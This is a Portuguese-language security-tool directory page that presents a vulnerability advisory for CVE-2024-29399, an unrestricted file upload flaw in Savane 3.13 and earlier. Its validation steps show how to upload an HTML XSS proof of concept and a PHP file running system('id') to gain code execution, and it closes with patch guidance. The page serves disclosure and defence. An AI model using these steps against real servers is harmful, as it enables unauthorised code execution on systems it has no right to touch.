Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-29399 — Referência CVE-2024-29399 | Kitploit
Ferramentas/GitHubGitHub/ally-petitt/cve-2024-29399
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubally-petitt/cve-2024-29399

CVE-2024-29399

Referência CVE-2024-29399

Ver Repositório
10há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Detalhes da Vulnerabilidade CVE-2024-29399

Visão Geral

No Savane v3.13 e anteriores, a falta de validação em arquivos enviados pode permitir escalada de privilégios. Servidores web configurados de acordo com as instruções de instalação são vulneráveis a Cross-Site Scripting (XSS). Em servidores web mal configurados, isso pode levar à Execução Remota de Código (RCE).

Classificação CWE: CWE-434: Upload irrestrito de arquivo com tipo perigoso

Relatado por: Ally Petitt

Produto Afetado: Savane

Versões Afetadas: 3.13 e anteriores

Passos de Validação

  1. Acesse /register/upload.php no navegador.
  2. Envie um arquivo malicioso. Isso pode ser, mas não se limita a, um arquivo HTML ou PHP dependendo da configuração do servidor web (veja Visão Geral). Exemplos de ambos são mostrados abaixo:

PoC.html

<script>
  alert("XSS");
</script>

PoC.php

<?php
  echo system("id");
?>
  1. Visite o link exibido para o arquivo enviado para acionar a execução do código.

Mitigação

Atualize para a versão 3.14 ou superior do Savane. O patch pode ser encontrado aqui.

Baixar ferramenta